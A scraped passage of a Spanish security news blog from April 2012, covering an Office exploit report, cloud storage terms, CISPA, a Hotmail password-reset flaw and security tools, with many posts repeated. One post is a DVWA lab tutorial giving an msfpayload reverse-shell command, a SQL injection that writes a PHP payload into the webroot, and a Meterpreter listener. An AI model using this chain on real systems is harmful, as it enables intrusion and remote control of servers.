El pasado 10 de abril Microsoft lanzó una serie de actualizaciones para sus productos, entre ellas un parche en el que se cerraba un fallo de seguridad crítico en Microsoft Office. Aunque en ese entonces no se tenían ningún informe de ataques a través de esta vulnerabilidad, investigadores de McAfee han reportado que la misma ya está siendo explotada para infectar usuarios.
De acuerdo con la firma de seguridad, se han descubierto una serie de archivos malignos en formato RTF, Word y Excel que son distribuidos a través de correo electrónico y que se caracterizan por tener un objeto OLE incrustado. Basta con que la víctima abra el documento para que la vulnerabilidad sea explotada y con ello se instale un troyano en el sistema.
Según explica McAfee, al momento de que se abre el documento malicioso se explota la vulnerabilidad y se ejecuta una shellcode del archivo OLE, la cual tiene como finalidad la instalación del malware. Sin embargo, para despistar a la víctima, la misma shellcode también inicia un nuevo documento de Word, y debido a esto los usuarios pueden percatarse como Word o Excel primero se cierra e inmediatamente vuelve a ejecutarse para mostrar un documento en blanco.
Así que, nuevamente les recomendamos a los usuarios instalar cuanto antes los últimos parches de seguridad de Microsoft, los cuales están disponible en la página de Windows Update o mediante la herramienta de actualizaciones automáticas. Además de la suite ofimática, cabe recordar que también se solucionaron diferentes fallos de categoría crítica en todas las versiones de Windows e Internet Explorer.
Fuente: Open Security
Comparación de condiciones de almacenamiento en la nube
Según esta comparación, los términos estándar de Google son especialmente graves en el contexto de almacenamiento en la nube personal.
Cuando cargue o someta su contenido a nuestros servicios, estará concediendo a Google (y con quienes trabajamos) una licencia mundial para utilizar, alojar, almacenar, reproducir, modificar, crear trabajos derivados (tales como las traducciones, adaptaciones o cambios que hacen que su contenido funcione mejor con nuestros Servicios), comunicar, publicar, ejecutar públicamente, mostrar públicamente y distribuir dicho contenido".
En resumen lo que usted piense a Google no le importa.
Cristian de la Redacción de Segu-Info
Dropbox
https://www.dropbox.com/terms"By using our Services you provide us with information, files, and folders that you submit to Dropbox (together, "your stuff"). You retain full ownership to your stuff. We don’t claim any ownership to any of it. These Terms do not grant us any rights to your stuff or intellectual property except for the limited rights that are needed to run the Services, as explained below.""Mediante el uso de nuestros servicios Ud. nos proporciona información, archivos y carpetas que envía a Dropbox (todo juntos, "sus cosas"). Usted conservará la plena propiedad de sus cosas. Nosotros no reclamamos la titularidad de ninguno de ellos. Estas Condiciones no nos conceden ningún derecho sobre sus cosas o su propiedad intelectual a excepción de los derechos limitados que son necesarios para ejecutar los servicios, tal como se explica a continuación. "
SkyDrive
http://windows.microsoft.com/en-US/windows-live/microsoft-service-agreement?SignedIn=1"Except for material that we license to you, we don't claim ownership of the content you provide on the service. Your content remains your content. We also don't control, verify, or endorse the content that you and others make available on the service.""Microsoft no reclama la propiedad del contenido que usted proporcione en el servicio, excepto de aquél cuya licencia le haya concedido. El contenido seguirá siendo de su propiedad. Microsoft tampoco controla, comprueba ni aprueba el contenido que usted y otros usuarios pongan a disposición en el servicio."
You understand that Microsoft may need, and you hereby grant Microsoft the right, to use, modify, adapt, reproduce, distribute, and display content posted on the service solely to the extent necessary to provide the service."Usted entiende que Microsoft puede necesitar usar, modificar, adaptar, reproducir, distribuir y mostrar contenido publicado en el servicio exclusivamente hasta el límite necesario para prestar el servicio, y por la presente concede a Microsoft estos derechos."
Google Drive
http://www.google.com/intl/en/policies/terms/"You retain ownership of any intellectual property rights that you hold in that content. In short, what belongs to you stays yours."Usted retiene la propiedad intelectual y los derechos sobre su contenido. En resumen, lo que le pertenece, se mantiene suyo.
When you upload or otherwise submit content to our Services, you give Google (and those we work with) a worldwide license to use, host, store, reproduce, modify, create derivative works (such as those resulting from translations, adaptations or other changes we make so that your content works better with our Services), communicate, publish, publicly perform, publicly display and distribute such content."
Cuando cargue o someta su contenido a nuestros servicios, estará concediendo a Google (y con quienes trabajamos) una licencia mundial para utilizar, alojar, almacenar, reproducir, modificar, crear trabajos derivados (tales como las traducciones, adaptaciones o cambios que hacen que su contenido funcione mejor con nuestros Servicios), comunicar, publicar, ejecutar públicamente, mostrar públicamente y distribuir dicho contenido".
En resumen lo que usted piense a Google no le importa.
Cristian de la Redacción de Segu-Info
#Anonymous anuncia Operation Defense Phase II contra #CISPA
Ya existe un nuevo video que anuncia la "Operation Defense Phase II" desde hoy primero de mayo hasta el 30 de junio (2 meses completos) para protestar contra la aprobación de CISPA.
En la primera fase de la operación se trató de un esfuerzo coordinado para protestar contra CISPA con diversas tácticas habituales para los "anónimos". En el video se admite que los ataques DDoS ya no son tan efectivos porque muchas organizaciones han actualizado su red para manejar la afluencia de visitas.
Para ello, Anónimo propone un calendario para ocupar y protestar en forma física contra las corporaciones y los políticos que apoyan CISPA. Anónimo espera que las protestas sean similares que las que se hicieron contra la Iglesia de la Cienciología hace unos años.
Esto significa que ellos están buscando a gente para protestar en varios lugares que son propiedad de estas empresas, no sólo en una oficina corporativa o en un área general. En esencia, están llevando la lucha a los lugares que la gente visita normalmente.
Los objetivos de la protesta de dos meses de largo será de AT&T, IBM, Intel, Microsoft, Verizon, Bank of America, Chase Bank, McGraw-Hill, Pepsi, Coca-Cola, Target, Wal-Mart, CVS, MasterCard, Visa, y american Express. Cada protesta se establecerá entre determinadas fechas.
Fuente: WebProNews
En la primera fase de la operación se trató de un esfuerzo coordinado para protestar contra CISPA con diversas tácticas habituales para los "anónimos". En el video se admite que los ataques DDoS ya no son tan efectivos porque muchas organizaciones han actualizado su red para manejar la afluencia de visitas.
Para ello, Anónimo propone un calendario para ocupar y protestar en forma física contra las corporaciones y los políticos que apoyan CISPA. Anónimo espera que las protestas sean similares que las que se hicieron contra la Iglesia de la Cienciología hace unos años.
Esto significa que ellos están buscando a gente para protestar en varios lugares que son propiedad de estas empresas, no sólo en una oficina corporativa o en un área general. En esencia, están llevando la lucha a los lugares que la gente visita normalmente.
Los objetivos de la protesta de dos meses de largo será de AT&T, IBM, Intel, Microsoft, Verizon, Bank of America, Chase Bank, McGraw-Hill, Pepsi, Coca-Cola, Target, Wal-Mart, CVS, MasterCard, Visa, y american Express. Cada protesta se establecerá entre determinadas fechas.
Fuente: WebProNews
Obtener una sesión meterpreter explotando SQL Injection
Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.
1. Creamos el payload:
2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:
http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php
3. El codigo quedaría algo así:
4. Inyectamos el siguiente comando en la aplicación web:
5. Nos quedamos escuchando para cuando se ejecuta el payload.
5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.
6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.
Contenido completo en Red Orbita
1. Creamos el payload:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:
http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php
3. El codigo quedaría algo así:
233c3f7068700a0a6572726f725f7265706f7274696e672830...4. Inyectamos el siguiente comando en la aplicación web:
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#5. Nos quedamos escuchando para cuando se ejecuta el payload.
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E
6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.
Contenido completo en Red Orbita
Sacando provecho a Nessus 5
En esta entrada trataremos otra vez de cómo sacarle provecho a Nessus, en concreto vamos a comentar brevemente algunas de las mejoras que trae su nueva versión, Nessus 5 y algunas de sus posibles aplicaciones.
La instalación y configuración ahora es mucho más sencilla y puede realizarse a través de un panel de administración vía Web. Además han incluido una nueva clasificación para la criticidad de las vulnerabilidades, ahora las engloban en Info, Low, Medium, High y Critical. Hay diferentes novedades pero la que personalmente me ha llamado más la atención es la incorporación de nuevos filtros tanto para la creación de Informes (Reports) como de Políticas de escaneo (Policies).
Por ejemplo a la hora de crear una nueva política podemos seleccionar solo aquellos plugins para los que haya exploit en el Framework Metasploit, para ello deshabilitamos todos los plugins, creamos nuestros filtros exigiendo que cumpla lo que deseamos, los guardamos y al ir seleccionando las familias de plugins que queramos solo se habilitarán aquellos que cumplan con las opciones de filtrado.
Contenido completo en fuente original Security Art Work
La instalación y configuración ahora es mucho más sencilla y puede realizarse a través de un panel de administración vía Web. Además han incluido una nueva clasificación para la criticidad de las vulnerabilidades, ahora las engloban en Info, Low, Medium, High y Critical. Hay diferentes novedades pero la que personalmente me ha llamado más la atención es la incorporación de nuevos filtros tanto para la creación de Informes (Reports) como de Políticas de escaneo (Policies).
Por ejemplo a la hora de crear una nueva política podemos seleccionar solo aquellos plugins para los que haya exploit en el Framework Metasploit, para ello deshabilitamos todos los plugins, creamos nuestros filtros exigiendo que cumpla lo que deseamos, los guardamos y al ir seleccionando las familias de plugins que queramos solo se habilitarán aquellos que cumplan con las opciones de filtrado.
Contenido completo en fuente original Security Art Work
Correo con engaño, geoposicionamiento y supuestas frases para Facebook
En los últimos días hemos recibidos varias denuncias de usuarios que reciben un correo con una simple frase y un enlace:
El correo parece provenir de direcciones "aleatorias" pero siempre desde personas que son contactos de quien recibe el correo, lo cual deja claro que alguien inicialmente cae en la trampa y posteriormente, de forma automática se comienzan a enviar correos a los contactos.
El sitio web al que se ingresa si se hace clic en el enlace tiene varias particularidades.
1. Se ejecuta un conocido script de geoposicionamiento (Maxmind) para ubicar el país de la víctima. En este caso podemos ver como ha se ha establecido mi posición:
Luego, se realiza una redirección de la víctima a otro sitio web donde se realiza el engaño y se roba información del usuario.
2.Se redirecciona al usuario a sitios distintos que puede depender del navegador o de alguna otra variable que el delincuente haya considerado.
Los sitios web destinos varían continuamente y pueden ir desde ser un caso de Phishing de Live/MSN/Hotmail, el cual roba las credenciales del usuario y luego redirige al usuario al sitio siguiente:
Un sitio que dice ofrecer frases para compartir en Facebook y que hasta el momento de escribir el presente, ha tenido más de 13.000 ingresos:
Una vez más observamos como los usuarios son capaces de entregar su información a cambio de nada y con algo tan simple como haciendo clic en un enlace.
Cristian de la Redación de Segu-Info
El sitio web al que se ingresa si se hace clic en el enlace tiene varias particularidades.
1. Se ejecuta un conocido script de geoposicionamiento (Maxmind) para ubicar el país de la víctima. En este caso podemos ver como ha se ha establecido mi posición:
2.Se redirecciona al usuario a sitios distintos que puede depender del navegador o de alguna otra variable que el delincuente haya considerado.
Los sitios web destinos varían continuamente y pueden ir desde ser un caso de Phishing de Live/MSN/Hotmail, el cual roba las credenciales del usuario y luego redirige al usuario al sitio siguiente:
Cristian de la Redación de Segu-Info
29 abr 2012
Malware para Windows y Mac desarrollado en Python
Expertos de Sophos Labs han identificado un ataque de un nuevo malware llamado OSX/Flsply dirigido a Mac y Windows y se aprovecha de la vulnerabilidad de seguridad en Java que permitió infectar a los usuarios con el troyano Flashback.Los usuarios que visitan páginas web comprometidas pueden encontrarse en riesgo de infección a través de un exploit en Java que descarga un archivo ejecutable en Windows y un archivo en Python, si el sistema operativo es Mac OS (install_flash_player.py).
Esta secuencia de comandos Python actúa como una puerta trasera en Mac OS X, permitiendo a usuarios remotos enviar comandos, robar archivos y ejecutar acciones sin el conocimiento del usuario.
Cristian de la Redacción de Segu-Info
Cuatro de cada diez bufetes europeos desconocen si su información confidencial está en riesgo
Cuatro de cada diez bufetes europeos (42%) desconocen si han tenido alguna brecha de seguridad en la información confidencial que manejan en los tres últimos años, según un estudio llevado a cabo por la empresa de gestión de la información Iron Mountain y PwC [PDF].
La información delicada de los despachos de abogados está en riesgo, ya que muchos de ellos no comprueban si sus empleados implementan medidas de seguridad, concluye el informe.
Más de la mitad (56%) de los encuestados admitieron que, a pesar de haber introducido una estrategia para gestionar el riesgo de la información, han fracasado en supervisar si ésta es realmente efectiva.
Un número similar (59%) ha asignado la responsabilidad de la gestión de la información a una persona o un equipo de personas específico, aunque no ha comprobado su eficacia. Más de la mitad (54%) no lleva un control de si las políticas para la destrucción segura de la información son implementadas correctamente.
Los resultados del estudio revelaron que el impacto de esta despreocupación puede ser catastrófico. Las firmas legales que admitieron haber sufrido alguna brecha de seguridad en sus datos, nombraron como principales efectos negativos los daños a la reputación, la pérdida de confianza profesional y el riesgo de que la situación se conozca fuera del ámbito del despacho.
De las compañías La puntuación obtenida por las empresas europeas fue de 40,6 frente a la puntuación máxima de 100. El sector legal alcanzó solo una puntuación de 33,3, siendo el sector financiero el que consiguió la nota más alta: 46,3.
El director de Seguridad de la Información en Iron Mountain Europe, Christian Toon, señaló que el estudio "revela una despreocupación alarmante en el sector legal europeo, ya que no sirve de nada invertir en recursos para garantizar la seguridad de la información, si nadie tiene un control posterior".
"Todo el dinero y la tecnología del mundo no podrán proteger los datos sensibles de una empresa si el personal no está formado, controlado y respaldado. El impulso para que esto suceda debe venir desde la dirección de la empresa", añadió Toon.
Fuente: Información.com
La información delicada de los despachos de abogados está en riesgo, ya que muchos de ellos no comprueban si sus empleados implementan medidas de seguridad, concluye el informe.
Más de la mitad (56%) de los encuestados admitieron que, a pesar de haber introducido una estrategia para gestionar el riesgo de la información, han fracasado en supervisar si ésta es realmente efectiva.
Un número similar (59%) ha asignado la responsabilidad de la gestión de la información a una persona o un equipo de personas específico, aunque no ha comprobado su eficacia. Más de la mitad (54%) no lleva un control de si las políticas para la destrucción segura de la información son implementadas correctamente.
Los resultados del estudio revelaron que el impacto de esta despreocupación puede ser catastrófico. Las firmas legales que admitieron haber sufrido alguna brecha de seguridad en sus datos, nombraron como principales efectos negativos los daños a la reputación, la pérdida de confianza profesional y el riesgo de que la situación se conozca fuera del ámbito del despacho.
De las compañías La puntuación obtenida por las empresas europeas fue de 40,6 frente a la puntuación máxima de 100. El sector legal alcanzó solo una puntuación de 33,3, siendo el sector financiero el que consiguió la nota más alta: 46,3.
El director de Seguridad de la Información en Iron Mountain Europe, Christian Toon, señaló que el estudio "revela una despreocupación alarmante en el sector legal europeo, ya que no sirve de nada invertir en recursos para garantizar la seguridad de la información, si nadie tiene un control posterior".
"Todo el dinero y la tecnología del mundo no podrán proteger los datos sensibles de una empresa si el personal no está formado, controlado y respaldado. El impulso para que esto suceda debe venir desde la dirección de la empresa", añadió Toon.
Fuente: Información.com
Modelo Cliente-Servidor en dispositivos móviles
Analizando la aplicación Sybase Afaria para dispositivos Android (gratuita a través del play.google.com), podemos ver, entre otras, que como características tiene la posibilidad de gestionar ciertas acciones de forma remota.
Tras solicitar por dos veces la versión de evaluación de la maqueta (Sybase Afaria Server) que el propio fabricante dice ofrecer de forma gratuita y no obtener ningún tipo de respuesta, en un plazo de un año, opté por realizar el análisis sin el debido contexto, a modo experimental y sabiendo que cualquier conclusión ha de ser contrastada desplegando un entorno Cliente-Servidor adecuado.
A grandes rasgos, tenemos cinco posibles comandos de gestión remota del dispositivo.
Y la gestión de dichos comandos se realiza a través de la recepción de un SMS con un formato especifico.
Contenido completo en fuente original S21Sec
Tras solicitar por dos veces la versión de evaluación de la maqueta (Sybase Afaria Server) que el propio fabricante dice ofrecer de forma gratuita y no obtener ningún tipo de respuesta, en un plazo de un año, opté por realizar el análisis sin el debido contexto, a modo experimental y sabiendo que cualquier conclusión ha de ser contrastada desplegando un entorno Cliente-Servidor adecuado.
A grandes rasgos, tenemos cinco posibles comandos de gestión remota del dispositivo.
- Hard-Reset.
- Hard-Reset incluyendo el borrado de la tarjeta SD.
- Borrado de datos PIM.
- Bloqueo de dispositivo.
- Desbloqueo de dispositivo.
Y la gestión de dichos comandos se realiza a través de la recepción de un SMS con un formato especifico.
Contenido completo en fuente original S21Sec
28 abr 2012
Grave fallo de seguridad en Hotmail permitía el robo de cuentas
Benjamin Kunz Mejri ha descubierto una manera de modificar la contraseña de cualquier cuenta de Hotmail y, por tanto, robarla de su usuario legítimo. Ha trabajado con el equipo de Microsoft para arreglar el fallo antes de hacerlo público, pero parece que algún atacante se le adelantó y, con otras intenciones, usó el fallo en su propio beneficio. Repasamos algunos de los grandes fallos de seguridad de Hotmail.
Kunz avisó el 6 de abril a Microsoft del grave problema. El token usado para proteger la sesión de restablecimiento de contraseña se podía eludir usando valores como "+++)-" puesto que solo comprobaba si estaba vacío para cerrar o bloquear la sesión. El resultado es que se podía secuestrar cualquier cuenta de Hotmail.
Unos días antes, un atacante de origen saudita vendía en foros underground acceso a contraseñas de terceros por 20 euros. Parece que no se tomó muy en serio su aviso, hasta que el equipo de Microsoft comprobó que el descubrimiento de Kunz y ciertos incidentes detectados días antes y relacionados con el robo de cuentas muy atractivas (por ejemplo [email protected]) coincidían. Tanto el investigador como el atacante había descubierto el fallo de manera independiente, pero uno lo estaba usando en su propio beneficio y otro alertó inmediatamente a Microsoft. El 21 de abril ya se había corregido el problema, y el 26 se ha hecho público.
Fuente: Hispasec
Kunz avisó el 6 de abril a Microsoft del grave problema. El token usado para proteger la sesión de restablecimiento de contraseña se podía eludir usando valores como "+++)-" puesto que solo comprobaba si estaba vacío para cerrar o bloquear la sesión. El resultado es que se podía secuestrar cualquier cuenta de Hotmail.
Unos días antes, un atacante de origen saudita vendía en foros underground acceso a contraseñas de terceros por 20 euros. Parece que no se tomó muy en serio su aviso, hasta que el equipo de Microsoft comprobó que el descubrimiento de Kunz y ciertos incidentes detectados días antes y relacionados con el robo de cuentas muy atractivas (por ejemplo [email protected]) coincidían. Tanto el investigador como el atacante había descubierto el fallo de manera independiente, pero uno lo estaba usando en su propio beneficio y otro alertó inmediatamente a Microsoft. El 21 de abril ya se había corregido el problema, y el 26 se ha hecho público.
Fuente: Hispasec
El administrador de #Cuevana a juicio: lo que viene
El 15 de marzo pasado el Fiscal General ante la Cámara Nacional de Apelaciones en lo Criminal y Correccional de la Capital Federal Dr. Ricardo Saenz remitió a la oficina de sorteos de la Exma. Cámara del Crimen un expediente que incluye dos investigaciones preliminares promovidas contra los administradores del sitio web www.cuevana.tv, a saber: Tomas Escobar, Mario Cardosio y David Fernandez.
El representante del Ministerio Público dió por concluídas las investigaciones preliminares, promovió la acción penal pública contra los nombrados y solicitó la declaración indagatoria de Tomas Escobar dejando en claro que los denunciantes le habían solicitado la inmediata remisión del expediente a sorteo para que un juez de instrucción los reconozca como parte querellante y ordene, como medida cautelar, el bloqueo definitivo de acceso al sitio en el cual se reproducen películas y contenidos de propiedad de los denunciantes.
La primer investigación preliminar fue promovida el 20 de diciembre de 2011 por Twentieth Century Fox Film Corporation, Disney Enterprises Inc, Paramount Pictures Corporation, Columbia Pictures Industries Inc, Universal City Studios LLC., Universal City Studios Productions LLLP. y Warner Bros Entertainment Inc. y la segunda fue iniciada el 29 de diciembre de 2011 por Televisión Federal S.A. (Telefé).
En ambas denuncias se imputa a los administradores del referido sitio una concreta violación a la ley de propiedad intelectual argentina.
Una vez designado el juez de instrucción correspondiente quedó sellada la suerte de los administradores de Cuevana que serán investigados por el delito previsto en el art. 72 de la ley 11.723 que establece penas de hasta seis años de prisión (con remisión al artículo 172 del Código Penal que contempla la figura genérica de la estafa) por violación a derechos de propiedad intelectual.
Contenido completo en fuente original Abogados
El representante del Ministerio Público dió por concluídas las investigaciones preliminares, promovió la acción penal pública contra los nombrados y solicitó la declaración indagatoria de Tomas Escobar dejando en claro que los denunciantes le habían solicitado la inmediata remisión del expediente a sorteo para que un juez de instrucción los reconozca como parte querellante y ordene, como medida cautelar, el bloqueo definitivo de acceso al sitio en el cual se reproducen películas y contenidos de propiedad de los denunciantes.
La primer investigación preliminar fue promovida el 20 de diciembre de 2011 por Twentieth Century Fox Film Corporation, Disney Enterprises Inc, Paramount Pictures Corporation, Columbia Pictures Industries Inc, Universal City Studios LLC., Universal City Studios Productions LLLP. y Warner Bros Entertainment Inc. y la segunda fue iniciada el 29 de diciembre de 2011 por Televisión Federal S.A. (Telefé).
En ambas denuncias se imputa a los administradores del referido sitio una concreta violación a la ley de propiedad intelectual argentina.
Una vez designado el juez de instrucción correspondiente quedó sellada la suerte de los administradores de Cuevana que serán investigados por el delito previsto en el art. 72 de la ley 11.723 que establece penas de hasta seis años de prisión (con remisión al artículo 172 del Código Penal que contempla la figura genérica de la estafa) por violación a derechos de propiedad intelectual.
Contenido completo en fuente original Abogados
CIntruder y Tesseract, dos CAPTCHA Cracking
Los desarrolladores XSSer acaban de lanzar una nueva herramienta llamada CIntruder, desarrollada en Python y que permite eludir CAPTCHAs en forma automática.
Otra herramienta que tiene el mismo objtivo es Tesseract, un software gratuito desarrollado por HP y que puede ser utilizado como un motor óptico de reconocimiento de caracteres para varios sistemas operativos. Tesseract está considerado como uno de los OCR más precisos.
Fuente: CLSHack I y II
Otra herramienta que tiene el mismo objtivo es Tesseract, un software gratuito desarrollado por HP y que puede ser utilizado como un motor óptico de reconocimiento de caracteres para varios sistemas operativos. Tesseract está considerado como uno de los OCR más precisos.
Fuente: CLSHack I y II
Un escaner de seguridad para SAP 2.0
ERPScan liberó ERPScan Security Scanner for SAP 2.0- una compleja solución para monitorear de forma continua todas las áreas de seguridad de SAP, desde la evaluación de vulnerabilidades y fallas de configuración hasta la revisión de código ABAP y el análisis de privilegios críticos del negocio.
Uno de los cambios más significativos es un nuevo módulo que puede realizar análisis estático de la seguridad del código ABAP. Esto hace del ERPScan la única solución del mercado que realiza tanto la evaluación de seguridad de la plataforma como la revisión del código.
El número de chequeos anónimos que pueden ser llevados a cabo en el modo de pruebas de penetración se han aumentado significativamente para ayudar a las compañías a identificar problemas sin usar credenciales en el sistema.
El nuevo motor puede ayudar a realizar verificaciones de cumplimiento y auditoria no solo mediante RFC --permite realizar escaneos completos a través de la interfaz web, que es una gran característica para pruebas de penetración externas y puede hacer más sencilla la vida de los pen-testers.
Más funciones nuevas:
"A pesar del aumento de la popularidad de los sistemas de seguridad ERP en la comunidad de seguridad, las compañías siguen siendo vulnerables al cibercrimen y los atacantes internos. Hasta el momento SAP ha publicado más de 2000 notas de Seguridad cerrando varias vulnerabilidades, lo cual es mucho, especialmente si tenemos en cuenta que algunas veces es suficiente con una sola falla de seguridad para conseguir acceso a toda la información crítica de negocios. Se presentó un ejemplo en la BlackHat el pasado verano. Por otro lado, casi todas las compañías desarrollan código ABAP propio que también puede contener vulnerabilidades y puertas traseras dejadas por los desarrolladores".
"La evaluación de seguridad SAP, según nuestra experiencia, suele tomar mucho tiempo. Adicionalmente, la complejidad del sistma y la gran cantidad de instalaciones de diferente tipo requieren la participación de especialistas de varios campos de la seguridad. Incluso el servidor de aplicación puede tener una plataforma ABAP o Java, y estos requieren de especialistas completamente diferentes, sin mencionar las aplicaciones y módulos particulares. ERPScan permite simplificar significativamente la tarea de evaluación mediante la automatización de la mayoría de los chequeos habituales, de tal forma se le puede prestar más atención al análisis de la parte hecha a medida," concluye Alexander.
Traducción: Raúl Batista - Segu-Info
Fuente: Help Net Security
Uno de los cambios más significativos es un nuevo módulo que puede realizar análisis estático de la seguridad del código ABAP. Esto hace del ERPScan la única solución del mercado que realiza tanto la evaluación de seguridad de la plataforma como la revisión del código.
El número de chequeos anónimos que pueden ser llevados a cabo en el modo de pruebas de penetración se han aumentado significativamente para ayudar a las compañías a identificar problemas sin usar credenciales en el sistema.
El nuevo motor puede ayudar a realizar verificaciones de cumplimiento y auditoria no solo mediante RFC --permite realizar escaneos completos a través de la interfaz web, que es una gran característica para pruebas de penetración externas y puede hacer más sencilla la vida de los pen-testers.
Más funciones nuevas:
- Soporte de diferentes tipos de aplicaciones web (bsp/iviews/jsp/webservices/webdynpro’s)
- Más de 5.000 chequeos diferentes cubriendo errores de configuración, vulnerabilidades, acceso a aplicaciones web, búsqueda de 50 tipos diferentes de vulnerabilidades en código ABAP.
- Elaborada evaluación black-box de vulnerabilidades
- Catalogado de sistemas y servicios SAP
"A pesar del aumento de la popularidad de los sistemas de seguridad ERP en la comunidad de seguridad, las compañías siguen siendo vulnerables al cibercrimen y los atacantes internos. Hasta el momento SAP ha publicado más de 2000 notas de Seguridad cerrando varias vulnerabilidades, lo cual es mucho, especialmente si tenemos en cuenta que algunas veces es suficiente con una sola falla de seguridad para conseguir acceso a toda la información crítica de negocios. Se presentó un ejemplo en la BlackHat el pasado verano. Por otro lado, casi todas las compañías desarrollan código ABAP propio que también puede contener vulnerabilidades y puertas traseras dejadas por los desarrolladores".
"La evaluación de seguridad SAP, según nuestra experiencia, suele tomar mucho tiempo. Adicionalmente, la complejidad del sistma y la gran cantidad de instalaciones de diferente tipo requieren la participación de especialistas de varios campos de la seguridad. Incluso el servidor de aplicación puede tener una plataforma ABAP o Java, y estos requieren de especialistas completamente diferentes, sin mencionar las aplicaciones y módulos particulares. ERPScan permite simplificar significativamente la tarea de evaluación mediante la automatización de la mayoría de los chequeos habituales, de tal forma se le puede prestar más atención al análisis de la parte hecha a medida," concluye Alexander.
Traducción: Raúl Batista - Segu-Info
Fuente: Help Net Security
27 abr 2012
Se aprobó #CISPA, en secreto
Por sorpresa y con un día de antelación, ya que se tenía previsto la votación para este viernes, la Cámara de Representantes aprobó en la tarde de ayer el proyecto de ley CISPA. Con unos votos a favor de 248-168 y a la espera de su paso por el Senado, la regulación es aún peor que la redacción de hace unos días. Finalmente CISPA (Cyber Intelligence Sharing and Protection Act) es un “cheque en blanco” para que el gobierno actúe sobre los datos en la red de cualquier ciudadano en el país.
Y es que hasta hace unas horas el término “ciber-seguridad” era la base de la propuesta. A través del término el gobierno podría pedir e intercambiar los datos privados de los usuarios con empresas y terceros. Los proveedores de Internet y el resto de empresas que operan en la red debían acceder a los datos de cada usuario para luego informar a los organismos gubernamentales o compañías asociadas que lo soliciten. Una vaguedad en los escritos que durante las últimas semanas se debatía sobre sus límites y usos.
Finalmente es mucho peor. La votación sorpresa de ayer siguió el debate sobre las enmiendas, algunas de las cuales fueron aprobadas. La más destacada, la definición de lo que el gobierno puede hacer con la información compartida. No se ha puesto límite alguno ya que se especifica que sería limitar la actuación del gobierno.
Sorprendente que se haya votado una ley con un día de antelación cuyas bases estaban siendo discutidas. No sólo eso, se le añade una serie de peligrosas definiciones.
Anteriormente CISPA permitía al gobierno utilizar la información a través del término “ciber-seguridad” por la “seguridad nacional”. La ley aprobada no sólo no se ha limitado sino que se han añadido tres usos más:
Por lo tanto CISPA pierde el sentido por el que nació, el de la regulación que buscaba “ciber-seguridad”, por una mezcla de lo peor de SOPA con añadidos. Ahora el gobierno sería capaz de buscar cualquier información bajo CISPA sin que ningún ciudadano del país tenga inmunidad completa o protección de la privacidad siempre que se argumente que existe algún “crimen en la ciber-seguridad”.
Con la ley en la mano la Cuarta Enmienda perdería su status en el mapa digital y el gobierno podría hacer lo que quiera con los datos siempre que pueda decir que existe “peligro”.
Con CISPA aprobada se eliminan todas las leyes de privacidad que tengan implicación con la tecnología en la red. Un ataque directo a las libertades de los usuarios en Estados Unidos que ahora tendrá que pasar por el Senado, momento en el que Obama podrá decidir el veto o no.
Si la Patriot Act daba plenos poderes al país sobre cualquier ciudadano en el mundo amparados en el término “terrorismo”, el gobierno de Estados Unidos consigue con CISPA englobar todo lo que acontece en la red. Internet ya tiene “su” ley en Estados Unidos y la última palabra la tiene su presidente.
Fuente: Alt1040
Y es que hasta hace unas horas el término “ciber-seguridad” era la base de la propuesta. A través del término el gobierno podría pedir e intercambiar los datos privados de los usuarios con empresas y terceros. Los proveedores de Internet y el resto de empresas que operan en la red debían acceder a los datos de cada usuario para luego informar a los organismos gubernamentales o compañías asociadas que lo soliciten. Una vaguedad en los escritos que durante las últimas semanas se debatía sobre sus límites y usos.
Finalmente es mucho peor. La votación sorpresa de ayer siguió el debate sobre las enmiendas, algunas de las cuales fueron aprobadas. La más destacada, la definición de lo que el gobierno puede hacer con la información compartida. No se ha puesto límite alguno ya que se especifica que sería limitar la actuación del gobierno.
Sorprendente que se haya votado una ley con un día de antelación cuyas bases estaban siendo discutidas. No sólo eso, se le añade una serie de peligrosas definiciones.
Anteriormente CISPA permitía al gobierno utilizar la información a través del término “ciber-seguridad” por la “seguridad nacional”. La ley aprobada no sólo no se ha limitado sino que se han añadido tres usos más:
- Investigación y persecución de la delincuencia cibernética.
- Protección de las personas.
- Protección de los niños.
Por lo tanto CISPA pierde el sentido por el que nació, el de la regulación que buscaba “ciber-seguridad”, por una mezcla de lo peor de SOPA con añadidos. Ahora el gobierno sería capaz de buscar cualquier información bajo CISPA sin que ningún ciudadano del país tenga inmunidad completa o protección de la privacidad siempre que se argumente que existe algún “crimen en la ciber-seguridad”.
Con la ley en la mano la Cuarta Enmienda perdería su status en el mapa digital y el gobierno podría hacer lo que quiera con los datos siempre que pueda decir que existe “peligro”.
Con CISPA aprobada se eliminan todas las leyes de privacidad que tengan implicación con la tecnología en la red. Un ataque directo a las libertades de los usuarios en Estados Unidos que ahora tendrá que pasar por el Senado, momento en el que Obama podrá decidir el veto o no.
Si la Patriot Act daba plenos poderes al país sobre cualquier ciudadano en el mundo amparados en el término “terrorismo”, el gobierno de Estados Unidos consigue con CISPA englobar todo lo que acontece en la red. Internet ya tiene “su” ley en Estados Unidos y la última palabra la tiene su presidente.
Fuente: Alt1040
Integrigy para evaluar el puerto 1521 (Listener Oracle)
Buenas a todos, nombrar el puerto 1521 ya causa a muchos administradores sudores y sufrimiento, es uno de esos puertos fatídicos que se suelen quedar ahí, por defecto, sin bastionar el servicio que hay detrás, esperando a que llegue alguien para encontrar un regalo.
